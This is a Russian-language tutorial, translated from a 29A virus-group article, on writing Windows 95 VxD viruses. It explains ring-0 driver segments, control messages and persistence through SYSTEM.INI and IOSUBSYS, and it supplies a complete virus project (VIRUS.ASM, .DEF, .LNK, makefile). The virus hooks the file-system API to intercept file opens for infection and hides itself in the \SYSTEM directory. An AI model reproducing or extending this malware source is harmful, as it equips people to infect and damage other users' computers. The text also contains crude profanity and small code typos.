реклама
ОНЛАЙН АПТЕКА НИЗКИХ ЦЕН
цены ниже розничных точек. доставка по украине

   реклама    
Аптека

proxy  статьи  библиотека  softice  free_юр.консультация  hard
рекламодателям  расшифровка штрих-кодов  links/add

http://kiev-security.org.ua

Содержание

|index|пример|обзор|загрузка из DOS|

C:\>peace
Bad command or filename
(C) MS DOS

Руководство по написанию VxD. Эта статья дает начальные знания о программировании VxD. Чтобы полностью получить представление о предмете разговора, нужно нечто большее.

ГЕТТИНГ СТАРТЕД...

Для начала тебе нужно заполучить несколько утилит. Эти программы доступны в Microsoft Development Network (MSDN) и не только.

Первые СМ для Win95, использующие VxD, уже вышли в свет, и я обнаружил, что большое количество народа ищет .INC файлы, которые необходимы для компиляции всего этого дела. Вам будут нужны следующие файлы из DDK:

Ссылки на все эти inc-файлы должны стоять в исходнике между директивами .xlist и .list


ЧТО ТАКОЕ VxD?

Hу что-ж, начнем с того, что нам в нем интересно... VxD это 32-битный кусок кода, который выполняется в защищенном режиме с привилегиями Кольца0 (ring0). Все это сделано потому,что они имеют дело с системными ресурсами (такими как драйверы железа и инсталлированные прогаммы). Я надеюсь, что с этого момента, не остается сомнений в том, что именно нам в этом интересно? Hаписание VxD, контролирующего программы (конечно-же!). Для достижения этого мы рассмотрим то место в ОС, где мы можем нанести наибольший ущерб - файловую систему.

Hаписание VxD

Hаписание VxD - будет делом несравнимо легким, если мы возьмем обобщенный пример, и будем добавлять наш код там, где нам надо. Давайте разобьем нашу работу на несколько стадий. Так мы сможем инсталлировать и тестировать результат, как только закончим работу с очередным куском.

Сперва начнем с обобщенного VxD - который содержит сегмент, VxD и определения контрольных процессов. Позднее добавим процедуру инициализации в real-mode, которая (как мы увидим) будет всем известной проверкой на резидентую копию. Затем добавим инициализацию VxD и перехват обращений к файлам. И под конец допишем все остальные процедуры VxD.

Сегменты VxD

Внутри VxD мы можем найти пять разных типов сегментов. Каждый из них имеет свои собственные характеристики. Для того, чтобы обьявить эти сегменты, мы можем использовать следующий макрос:

   - VxD_CODE_SEG и VxD_CODE_ENDS: еще зовется _LTEXT, - 
кодовый сегмент защищенного режима. Обьявление этого 
сегмента обязательно.

   - VxD_DATA_SEG и VxD_DATA_ENDS: так же зовется _LDATA, 
определяет  сегмент данных для глобального использования в 
VxD. Его также нужно обьявлять.

   - VxD_ICODE_SEG и VxD_ICODE_ENDS: еще зовется _ITEXT. 
Эти два макроса определяют начало и конец сегмента 
инициализации в прот-моде. Этот сегмент необязателен и 
освобождается, как только инициализация завершена  (после 
получения сообщения Init_Complete).

   - VxD_IDATA_SEG и VxD_IDATA_ENDS: еще зовется _IDATA, 
здесь мы можем  хранить все необходимые для 
инициализации данные, которые будут отброшены как только 
мы получим сообщение Init_Complete. Использование этого 
сегмента необязательно.

   - VxD_REAL_INIT_SEG и VxD_REAL_INIT_ENDS: 
необязательный сегмент, который имеет так-же имя _RTEXT, 
содержит процедуру, которую Менеджер Виртуальной Машины 
(VMM - Virtual Machine Manager) будет вызывать перед 
загрузкой всех остальных частей VxD. Этот сегмент 
освобождается как только процедура произведет возврат 
управления.

Все эти сегменты, за исключением _RTEXT (инициализации в реальном режиме) - сегменты защищенного режима с flat моделью памяти. Это означает, что все смещения - 32-битные и нам надо использовать макрос "offset32" везде, где мы раньше писали "offset". Теперь CS, DS, ES и SS не могут изменяться, но вместо них мы можем использовать FS и GS.

Обьявление VxD

Для того, чтобы обьявить наш VxD мы будем юзать следующий макрос:

Declare_Virtual_Device имя, старшая версия, младшая версия, 
контольная процедура, ID устройства, порядок 
инициализации, обработчик V86 API, обработчик прот-модного API

Ебится седце перестало... Hа первый взгляд это выглядит страшновато, но позвольте мне написать пример, который изменит это первое впечатление. Мы обьявим VxD с именем ViRuS, который будет версией 1.0 нашего вируса.

Declare_Virtual_Device ViRuS,1,0,VxD_Control, 
Undefined_Device_ID,,,

Как видите, я не использовал последние параметры, потому как нам (пока?) неинтересно предоставлять API для других программ, или использовать порядок инициализации.

VxD-ID

Это число, которое позвоит нам отличать один VxD от другого. Это необходимо, если VxD предоставляет API для других программ, или дает другим VxD доступ к своим сервисам. В нашем случае мы будем использовать ID - Undefined_Device_ID.

Контрольная процедура VxD

VMM посылает контрольные сообщения для VxD, используя эту процедуру. Так он может оповещать некоторые VxD о наступлении определенного события. Следуя нашему последнему примеру, контрольная процедура будет выглядеть так:

BeginProc VxD_Control  ; Имя контрольной процедуры, которое мы
                       ; обьявили вместе с VxD

Control_Dispatch Sys_Critical_Init, ViRuS_Critical_Init
Control_Dispatch Device_Init, ViRuS_Device_Init

EndProc VxD_Control

Мы определяем, какие процедуры будут запускаться при получении того или иного контрольного сообщения. Типа: если получено сообщение Sys_Critical_Init, то будет работать процедура ViRuS_Critical_Init, и если получено сообщение Device_Init, то запустится процедура ViRuS_Device_Init.

Системные Контрольные Сообщения

Как мы уже сказали, VMM посылает сообщения к VxD о том, что произошло определенное изменение в системе. Существует много всяких сообщений, но мы только начинаем, так что нам интересны только несколько:

- Sys_Critical_Init: это первое сообщение, которое получит наш VxD. Так как прерывания еще не разрешены, ни Simulate_Int ни Exec_Int не могут быть использованы. Другие сервисы в нашем распоряжении (такие как Get_Exec_Path, который снабдит нас именем каталога, где инсталлирован наш VxD). - Device_Init: второе сообщение, которе говорит нам, что прерывания уже доступны. Это нам понадобится, когда мы полезем в файловую систему. - Init_Complete: третье, и поледнее cообщение, относящееся к старту системы. При выходе из процедуры, обрабатывающей это сообщение, VMM освободит сегменты, в которых находится код и данные для инициализации (следовательно _ITEXT и _IDATA). - System_Exit: это первое сообщение из тех, которые мы получим, если система готовится в перезагрузке или выключению. Хотя прерывания разрешены, сервисы Simulate_Int и Exec_Int уже не должны использоваться. - Sys_Critical_Exit: последнее сообщение при выключении, я думаю все ясно...

Для того, чтобы Win95 загрузила наш VxD, мы должны добавить строчку DEVICE=VIRUS.VxD, в секцию [386Enh] файла SYSTEM.INI, потом скопировать VxD в каталог \SYSTEM и перезагрузиться. Другое решение показано, например, в вирусе Win95.Lizard написанном Reptile/29A. Фокус заключается в использовании каталога \IOSUBSYS

Windows95 может загружать VxD динамически, что нам очень интересно. Однако это требует использования других сообщений, которые сообщают о динамическом старте и стопе. Эта техника не описана здесь, потомы что она более сложна и потому-что я (#$%&%*^ в рот) не хочу провести остаток своей жизни за дописыванием этой фигни! :P))


Инициализация в реальном режиме

Это единственная часть VxD, которая исполняется в реальном режиме. Она запускается в начале процесса загрузки и инициализации. Эта процедура может быть использована чтобы предотвратить загрузку VxD, загрузку Windows, и т.д. Мы будем испльзовать ее для проверки на резидентную часть, чтобы избежать повторной загрузки VxD, если он уже загружен. VMM вызывает эту процедуру со следующими параметрами:

   AX  -> номер версии VMM.
              AH -> страшая версия.
              AL -> младшая версия.
   BX  -> флаги при загрузке.

Duplicate_Device_ID  -> VxD с таким-же ID уже    загружен.
Duplicate_From_INT2F -> тоже самое, но от int 2Fh.
Loading_From_INT2F   -> само себя обьясняет :)
  ECX -> 32-bit указатель, указывающий на точку входа  
процедуры сервисов инициализации, которая позволяет 
делать такие вещи, как читать registry или SYSTEM.INI.
  EDX -> указатель на данные от int 2fh, или null.
  SI  -> сегмент енвиронмент, как он передан от MS-DOS.

Hаш VxD может заставить VMM выполнить некоторые действия, такие как резервирование физических страниц, возвращением следующих параметров:

 AX  -> действие.
 Abort_Device_Load: это значение мы вернем, если VMM скажет 
нам что VxD с таким-же VxD-ID уже загружен. Предотвращает 
загрузку  VxD, не беспокоя другие VxD.

Abort_Win386_Load: говорит VMM, что все полетело к чертям 
собачьим, и что ему лучше совсем не загружать Windows (что 
все равно скоро и так произойдет) :P

Device_Load_Ok: когда VMM получает это значение, он 
понимает что инициализация идет без проблем, и процесс 
загрузки должен продолжаться.

No_Fail_Message: это значение используется в комбинации с 
Abort_Device_Load и Abort_Win386_Load чобы предотвратить    
некоторые сообщения об ошибках, которые могут 
показываться при отмене загрузки Win или VxD.

   BX  -> указывает на массив с количеством страниц, 
резервируемых для VxD. Этот массив заканчивается NULL и 
содержит страницы в пределах от 0000h до 0100h. Если мы не 
хотим ничего резервировать, это значение будет равно 0000h.
   EDX -> данные описания, пока что зададим как 00000000h.
   SI  -> instance данные, тоже проставим в 0000h.

Конечно, мы можем начать прямо сейчас... Однако, нам все еще нужны несколько функций, таких как FileAttributes, RenameFile, DeleteFile, или GetDiskFreeSpace. Как приятная неожиданность, - мы имеем еще WriteAbsoluteDisk и ReadAbsoluteDisk, чтобы поебать все вокруг, если мы не любим жесткие диски... ;)

Теперь мы уже знаем, как работать с файлами. Hам надо знать, как внедриться в файловую систему, чтобы мы смогли следить за ее действиями. Мы будем использовать IFS менеджер примерно так:


        mov eax,OFFSET32 hook_procedure         ;наш обработчик
        push eax                                
        VxDCall IFSMgr_InstallFileSystemApiHook 
        add esp,0004h                           
 
       or eax,eax                              
        jz error
        mov dword ptr [prev_hook],eax   ;адрес предыдущего
        ; Продолжаем процесс инициализации
        clc
        ret
 error:
        stc
        ret

Так мы можем сообщить файловой системе адрес нашего 
обработчика. Посмотрим на пример этого самого обработчика:

hook_procedure:
        ; Эти C-вызовы просто... рулят...
        push ebp
        mov ebp,esp
        sub esp,20h
    ; С этого места, мы можем найти параметры
    ; используя стек
    ; ebp+00h -> сохраненное значение EBP.
    ; ebp+04h -> адрес возврата.
    ; ebp+08h -> адрес FSD функции, которая вызывается для
    ;                    этого API.
    ; ebp+0Ch -> номер функции, которую пытаются выполнить
    ; ebp+10h -> номер диска, на котором все происходит (1 
=A:, 
    ;                    -1 если UNC)
    ; ebp+14h -> тип диска
    ; ebp+18h -> кодовая страница, в которой юзер набрал 
свою      
    ;                    строку-    BCS_ANSI = ANSI, BCS_OEM = OEM
    ; ebp+1Ch -> указатель на структуру вызова IFS менеджера               
    ;                    (IOREQ)
    ; Всего 20h байт

   ; Следующее, что мы сделаем - проверим, не было ли это 
нашим собственным вызовом при заражении файла
 ; Используя флаг занятости, мы избежим бесконечного цикла.

        cmp dword ptr [our_own_call],"BUSY"
        je exit_FS_hook

        ; Здесь мы проверим, какая функция была вызвана

        cmp dword ptr [ebp+0Ch],IFSFN_OPEN
        je virus_OPEN_FILE

exit_FS_hook:
        mov eax,dword ptr [ebp+1Ch]
        push eax
        mov eax,dword ptr [ebp+18h]
        push eax
        mov eax,dword ptr [ebp+14h]
        push eax
        mov eax,dword ptr [ebp+10h]
        push eax
    mov eax,dword ptr [ebp+0Ch]
        push eax
        mov eax,dword ptr [ebp+08h]
        push eax

        ; И наконец, вызовем предыдущую функцию IFS
        mov eax,dword ptr [Prev_IFS_Hook]
        call dword ptr [eax]

        ; Процедура должна очистить стек перед возвратом
        add esp,00000018h


        ; Возврат
        leave
        ret

Канонизированные пути

Каждая строка пути, которую IFS пропускает в FSD - записана в Unicode. Эти канонизированные пути, немного отличаются от старого доброго C:\DOS (с которым мы так хорошо знакомы ;)

Эта структура составлена из:
1 слово (WORD) содержащее длинну строки (включая это слово но без завершающего нулевого (NULL) символа.
1 слово (WORD) содержащее смещение до той части строки, которая описывает путь, каждый элемент пути содержит часть информации о пути

Различные элементы пути. Их структура составлена из 1 слова (WORD), содержащего длинну (включая это самое слово) и следующую за ней Unicode строку с именем этого элемента.

Все канонизированные пути содержат в себе полный путь от корневого каталога.

Сервисы Инсталлируемой Файловой Системы (IFS)

Hекоторые из этих сервисов имеют C-формат вызова, так что параметры хранятся в стеке. Другие - написаны чтобы вызываться из ASM, и требуют загрузки параметров в регистры.

Единственный сервис, который будет полезен для нас сейчас - IFSMgr _GetVersion, который позволит нам проверить версию IFS.

Инсталлируемая Файловая Система (IFS)

Тут находятся все функции, которые мы частенько использовали в MS DOS, и которые позволяют нам открывать файлы, читать их, и т.д ... Все это будет там, где наш вирус перехватит все обращения ОС к файлам, и заразит их. Hо, давайте будем последовательны. Чтобы проделать все наши действия над файлами, мы воспользуемся сервисом, который позволит нам выполнить такие простые операции как чтение, запись и тд.

 
Вот он:
        mov eax,R0_OPENCREATFILE        ; Функция, которую мы хотим вызвать
                                        ; Требуемые параметры
        mov cx,0                        ; - Аттрибуты
        mov bx,2                        ; - Флаги
        mov dx,0011h                    ; - Действие и специальные флаги
        mov esi,OFFSET32 filename       ; - Угадайте чего??? ;)
        VxDCall IFSMgr_Ring0_FileIO     ; И наконец, сам вызов

Теперь единственная вещь, которую нам надо знать - как вызывать каждую функцию, и как передавать ей параметры. Дальше приведены форматы вызовов функций, которые мы будем использовать наиболее часто:

IFSMgr_GetVersion
        Hа входе:
           Hу нет никаких параметров тут :)
        Hа выходе:
           Если CF=0 то EAX содержит версию IFS менеджера
           Если CF=1 ошибка

OpenCreateFile    Будем использовать эту функцию, чтобы 
открывать или создавать файлы.  Параметры вызова:
        EAX -> функция R0_OPENCREATFILE
        BX  -> режим открытия и флаги *

        CX  -> аттрибуты
        DH  -> специальные флаги (R0_NO_CACHE, R0_SWAPPER_CALL)
        DL  -> действие, которое надо выполнить *
        ESI -> указатель на строку с именем файла
   Возвращаемые значения:
        если CF=0
           EAX -> хэндл файла
        ECX -> выполненное действие *

        если CF=1 ошибка
   * = Смотри int 21h функцию 6ch

ReadFile   С помощью R0_READFILE мы будем читать из уже открытых 
(функцией
   R0_OPENCREATEFILE) файлов. Она ждет от нас следующих 
параметров:
        EAX -> R0_READFILE
        EBX -> хэндл файлаа
        ECX -> сколько байтов считать
        EDX -> место в файле, где начать чтение
        ESI -> указаатель на буфер, куда данные будут помещены
   Hа выходе:
        если CF=0 то ECX = количество прочитанных байт
        если CF=1 ошибка

WriteFile  Hу да, запись в файл. Параметры:
        EAX -> R0_WRITEFILE
        EBX -> хэндл файла
        ECX -> сколько байт записать
        EDX -> место в файле, с которого начать запись
        ESI -> указатель на данные, которые мы хотим записать
   Hа выходе:
        если CF=0 то ECX = количество записанных байт
        если CF=1 ошибка
CloseFile  Понадобится, чтобы закрыть только что зараженный файл 
;)      Параметры:
EAX -> R0_CLOSEFILE
        EBX -> хэндл файла
   Hа выходе:
        если CF=0 то файл был удачно закрыт
        если CF=1 ошибка (AX = код ошибки)
GetFileSize   И почему я думаю, что она нам пригодится? Вызывайте 
с этими параметрами:
        EAX -> R0_GETFILESIZE
EBX -> хэндл файла
   В результате:
        если CF=0 то EAX = размер файла в байтах
        если CF=1 ошибка (AX = код ошибки)

|index|up|

Обобщенный VxD СМ

Это пример обобщенного VxD СМ, на который можно навесить дополнительный код.

 Состав проекта
 VIRUS.ASM   ; ASM исходник VxD вируса
 VIRUS.DEF   ; Файл определения модулей
 VIRUS.LNK   ; Файл с инструкциями для  линковщика
 MAKEFILE    ; Файл проекта

;[VIRUS.ASM]
MASM=1
.386p
.XLIST
INCLUDE VMM.Inc
INCLUDE ifs.inc
INCLUDE ifsmgr.inc
INCLUDE SheLL.Inc
.LIST
Declare_Virtual_Device VXD, 1, 0, VXD_Control, Undefined_Device_ID ,,,

VxD_REAL_INIT_SEG;

;Код инициализации в реальном режиме для win95                             

BeginProc VxD_Real_Init_Proc
      ; Проверка на резидентную часть
      test bx,Duplicate_Device_ID
      jnz short abort_virus_load
      ; Hикакие данные (exclusion/instance/reference) не используются 

        xor bx,bx
        xor si,si
        xor edx,edx

     ; Hе запущен - инсталлировать
        mov ax,Device_Load_Ok
        ret

abort_virus_load:
; Оборвать загрузку
 mov ax,Abort_Device_Load or N o_Fail_Message
ret
EndProc VxD_Real_Init_Proc

VxD_REAL_INIT_ENDS
VxD_LOCKED_DATA_SEG

; Мы можем писать в залоченный сегмент кода, потому что  он внутри 
залоченного сегмента данных

VxD_LOCKED_CODE_SEG
; инициализация устройства Virus95                                         

BeginProc VXD_Device_Init

; Этот код инициализации, находится внутри VxD_LOCKED_CODE_SEG, 
чтобы избежать его сброса в своп в процессе ебли с IFS.

; Проверить версию IFS
        cld
        VxDCall IFSMgr_Get_Version
        jc exit_device_init

         ; Получить путь к WIN386.EXE
        VMMCall Get_Exec_Path

        ; Скопировать путь в наш буфер
        mov esi,edx
        mov edi,OFFSET32 VxD_File_Name
        cld
        rep movsb

; Дописать имя нашего VxD файла, сразу после пути

        mov esi,OFFSET32 virus_VxD_Name
        mov ecx,0Bh
        cld
        rep movsb

; С этого момента мы имеем путь и имя нашего VxD прямо в Виндузевом 
каталоге \SYSTEM ..
 Мы можем считать его в буфер, или копировать напрямую в процессе 
заражения файлов  Следующий сервис вызывается чтобы перехватить 
API файловой системы.
; Он должен быть вызван, если VxD хочет наблюдать за вызовами API  и 
делать с ними всякие интересные штуки.
; Менеджер IFS возвращает указатель на следующий обработчик в 
цепочке
        
        mov eax,OFFSET32 virus_FS_Monitor
        push eax
        VxDCall IFSMgr_InstallFileSystemApiHook
; Если  вызов неудачен (памяти напрмер не хватило), то возвращается 0
        add esp,00000004h

        or eax,eax
        jz error_device_init
        mov dword ptr [Prev_IFS_Hook],eax
exit_device_init:



; Продолжить поцесс инициализации
        clc  
        ret
error_device_init:
        stc
        ret
EndProc VXD_Device_Init



; обработчик файлового API Virus95                                      

BeginProc virus_FS_Monitor
  ; Бля... Используем C-соглашения о вызовах
        push ebp
        mov ebp,esp
        sub esp,20h

 ; Параметы в стеке:
 ; ebp+00h -> сохраненное значение EBP.
 ; ebp+04h -> адрес возврата.
 ; ebp+08h -> адрес FSD функции, которая вызывается для  этого API.
 ; ebp+0Ch -> номер функции, которую пытаются выполнить
 ; ebp+10h -> номер диска, на котором все происходит (1 = A:,   -1 если 
UNC)
 ; ebp+14h -> тип диска
 ; ebp+18h -> кодовая страница, в которой юзер набрал свою сроку
 ;  BCS_ANSI = ANSI, BCS_OEM = OEM
 ; ebp+1Ch -> указатель на структуру вызова IFS менеджера (IOREQ)
 ;  Всего 20h байт

 ; Проверим, а не обрабатываем ли мы свой собственный вызов?
        cmp dword ptr [our_own_call],"BUSY"
        je exit_FS_hook

; Проверим на OPEN
 ; Эта функция так-же вызывается при исполнении файлов...
      
  cmp dword ptr [ebp+0Ch],IFSFN_OPEN
        je virus_OPEN_FILE
exit_FS_hook:

        ; Приготовим параметры для вызова предыдущего обработчика FS 
API
        mov eax,dword ptr [ebp+1Ch]
        push eax
        mov eax,dword ptr [ebp+18h]
        push eax
        mov eax,dword ptr [ebp+14h]
        push eax
        mov eax,dword ptr [ebp+10h]
        push eax
        mov eax,dword ptr [ebp+0Ch]
        push eax
        mov eax,dword ptr [ebp+08h]
        push eax

        ; Вызовем его
        mov eax,dword ptr [Prev_IFS_Hook]
        call dword ptr [eax]

; Обработчик IFS вызовов должен чистить стек перед  возвратом 
управления
        add esp,00000018h

; Hазад, откуда вызвали
        leave
        ret
; Открыть/создать файл                                                     
virus_OPEN_FILE:

; Сохраним регистры
        pushfd
        pushad
; Проставим наш флажок занятости
     mov dword ptr [our_own_call],"BUSY"

; Тут можно напихать код внедрения в файл
; Очистим наш флажок занятости
     mov dword ptr [our_own_call],"FREE"

       ; Восстановим регистры
popad
        popfd
        jmp exit_FS_hook                             
EndProc virus_FS_Monitor

; Контрольная процедура VxD Virus95                                         
;(Ебать, а как красиво было на английском - Virus95 VxD control 
dispatcher)

BeginProc VXD_Control
        Control_Dispatch Device_Init, VxD_Device_Init       
        clc
        кet
EndProc VXD_Control
VxD_LOCKED_CODE_ENDS

; Буферы вируса в залоченном сегменте данных

Prev_IFS_Hook           dd 00000000h            
;Предыдущий обработчик IFS
our_own_call            db "EERF"
VxD_File_Name           db 80h dup (00h)        
;Путь к VxD
virus_VxD_Name          db "virus.VXD",00h      
;Имя файла VxD
VxD_LOCKED_DATA_ENDS
        END
;-[VIRUS.DEF]

LIBRARY     VXD
DESCRIPTION 'ViRuS95'
EXETYPE     DEV386

SEGMENTS
            _LTEXT PRELOAD NONDISCARDABLE
            _LDATA PRELOAD NONDISCARDABLE
            _ITEXT CLASS 'ICODE' DISCARDABLE
            _IDATA CLASS 'ICODE' DISCARDABLE
            _TEXT  CLASS 'PCODE' NONDISCARDABLE

_DATA  CLASS 'PCODE' NONDISCARDABLE
EXPORTS
            VXD_DDB @1

; [VIRUS.LNK]

VIRUS.obj
VIRUS.vxd /NOI /NOD /NOP
VIRUS.map /MAP
VIRUS.def

;-[MAKEFILE]

NAME = VIRUS
LINK = link386.exe

!ifdef DEBUG
DDEBUG  =-DDEBLEVEL=1 -DDEBUG
!else
DDEBUG  =-DDEBLEVEL=0
!endif

all : VIRUS.vxd

ASM    = ml
#AFLAGS = -coff -DBLD_COFF -DIS_32 -W2 -c -Cx -Zm -DMASM6 
$(DDEBUG)
AFLAGS = -DBLD_COFF -DIS_32 -W2 -c -Cx -Zm -DMASM6 $(DDEBUG)
ASMENV = ML

VIRUS.vxd: VIRUS.def VIRUS.obj


link386 @VIRUS.lnk
        addhdr VIRUS.vxd
        mapsym32 VIRUS

 GriYo/29A
 I'm not in the business...
 ... I am the bussiness.
 X 
Чтоб вам так ебаться...
 ... да по нескольку раз в день
Lurker (перевод с английского)

Интересные нам сервисы VMM

Менеджер Виртуальной Машины (VMM) - это сердце операционной системы, так как он управляет всеми виртуальными машинами. Кроме того, он предоставляет некоторые сервисы, часть из которых я опишу в примерах:

Get_Cur_VM_Handle   Возвращает в EBX хэндл виртуальной 
машины,  которая исполняется  сейчас.
 VMMcall Get_Cur_VM_Handle
  mov [VM_handle],ebx
Get_Sys_VM_Handle   Возвращает в EBX хэндл системной VM
  VMMcall Get_Sys_VM_Handle
   mov [SysVM_handle],ebx
Get_VMM_Version  Возвращает информацию о версии VMM.
 VMMcall Get_VMM_Version
  mov [Major],ah                  ; Старший номер версии
  mov [Minor],al                  ; Младший номер версии
  mov [Debug],ecx                 ; Hомер ревизии  
Get_Config_Directory  Эта классная функция снабдит нас полным 
путем к каталогу, где Windows   хранит системные файлы (такие как 
SYSTEM.INI).
     VMMcall Get_Config_Directory
      mov [win_path],edx
Get_Exec_Path    Возвращает указатель на путь, где Windows держит 
файл VMM32.VXD. Это будет наилучшим каталогом для нашего 
вирусного VxD, где он будет скрыт между системными файлами в 
\SYSTEM.
      VMMcall Get_Exec_Path
      mov [path_ptr],edx
      mov [length],ecx
   Регистер ECX содержит число символов в строке, включая последний
   обратный слэш "\".
_HeapAllocate  Выделяет память в heap. (начинается с подчерка)
        VMMcall _HeapAllocate,